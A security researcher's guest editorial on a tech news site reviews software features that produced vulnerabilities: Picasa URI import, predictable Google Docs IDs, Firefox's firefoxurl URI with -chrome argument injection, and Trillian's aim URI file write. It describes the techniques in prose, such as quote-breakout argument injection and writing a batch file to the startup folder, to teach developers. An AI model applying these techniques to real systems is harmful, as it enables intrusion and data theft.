X
Business

Finding and exploiting holes in software features

* Ryan Naraine is on vacation. Guest Editorial by Nate McFetersWith the holiday season fast approaching, and being so in the spirit of giving,  I thought I'd compile a list of the top features that led to security issues I discovered with co-researcher Billy Rios.
Written by Ryan Naraine, Contributor

* Ryan Naraine is on vacation. 

Guest Editorial by Nate McFeters

Finding exploits in software features

With the holiday season fast approaching, and being so in the spirit of giving,  I thought I'd compile a list of the top features that led to security issues I discovered with co-researcher Billy Rios.

With the New Year on its way, this should give the developers out there a chance to come up with some New Year's resolutions regarding the lessons learned from a year in the wild world of computer security.

Picasa's Button Import Feature and Built-in Web Browser/Server

Google's Picasa includes a button import feature that can be accessed from a URI. This feature is actually quite useful; as it allows a user to click a link and import an XML description of a button into Picasa that when clicked will post images to Tabblo or Flickr albums. This is done with a Java applet that requires user interaction before upload.

Unfortunately, URIs are also accessible to attackers through cross-site scripting (XSS), so an attacker can XSS a Picasa user, load Flash which doesn’t do DNS pinning (this JUST missed our list), and then steal the user’s images without any interaction or confirmation.

I use Picasa to modify my pictures, but I can't help worrying about the built-in web browser and web server that Picasa includes. Sure, the server is bound to the local loopback, but we can access it through Flash loaded in Picasa's built-in browser as mentioned above. We could use the Flash we loaded in the built-in browser to attack the built-in server as well, which may lead to more vulnerabilities.

Starting web servers on the local loopback appears to be a design pattern for Google as Google Desktop does the same. From a features standpoint, this may provide a rich environment for extending applications. It’s important to consider the task at hand, and in the case of an application that is being used for photo editing, I have a hard time finding justification for having any service running.

Google Documents

Not to pick on Google here (they actually have a great security team) but the concept of Google Documents must not have been discussed with them. If it isn't a big enough security risk to have Google taking ownership of your documents, Billy and I have discovered a couple of holes that allow attackers to steal any documents we can guess the "doc_id" of, which is actually a predictable value.

Feature rich applications that offer people excellent functionality are great, but the privacy implications of putting potentially sensitive documents into the hands of a web application that is accessible by millions are monumental. Perhaps a better solution would've been to give users the option to do offline editing and keep their documents local.

The “firefoxurl” URI and the “-chrome” Argument

The firefoxurl URI basically opens Firefox and points it to a URL. This means that an attacker can start an instance of firefox.exe through an XSS attack vector through that same URI, and pass values to the command line. Since these values weren't sanitized, an attacker could inject additional command line arguments by breaking out of the current argument with a double quote character.

Alone this may not have been a major concern; however, Firefox also accepts the -chrome argument, which allows arbitrary chrome JavaScript code to be passed to Firefox. This allows us to run arbitrary commands.

These features do not seem to be necessary for normal users. If this was a necessary feature, some amount of sanitization should've occurred prior to passing the user supplied input.

Trillian's "aim" URI

"Hold on. The ini argument writes to the file it specifies?!” That was what Billy asked me over an IM session several months ago. "Yeah, I can control where it writes a file to," I responded. "Can you write content to it?" Billy asked. "No! That would be crazy," I replied.

WRONG! I could write arbitrary content to any file including as a batch script to the startup folder. This seemingly harmless option led to a command injection through XSS. This functionality should’ve just been hard-coded into the application. The same URI proved to be vulnerable to a stack overflow as user supplied input from the URI was not bounds checked.

So, what lessons have we learned this year? Well, the number of features is directly proportional to the amount of attack surface, and with URI abuse, it's even worse since it can be exploited through XSS. Some of these flaws should've been caught during a Secure SDLC process and it is amazing more companies are not performing these.

Considering XSS can allow scanning/attacking of internal machines, exploit memory corruption issues and command injections, and perform data theft, it can't possibly be ignored. Claiming XSS is not an issue is akin to believing that global warming is not an issue.

We are a long way from having all applications go through a secure design review. We’re even further away from the day where security wins out over features.

* Nate McFeters is a Senior Security Advisor for Ernst & Young’s Advanced Security Center. He has performed web application, deep source code, Internet, Intranet, wireless, dial-up, and social engineering engagements for several clients in the Fortune 500.

Editorial standards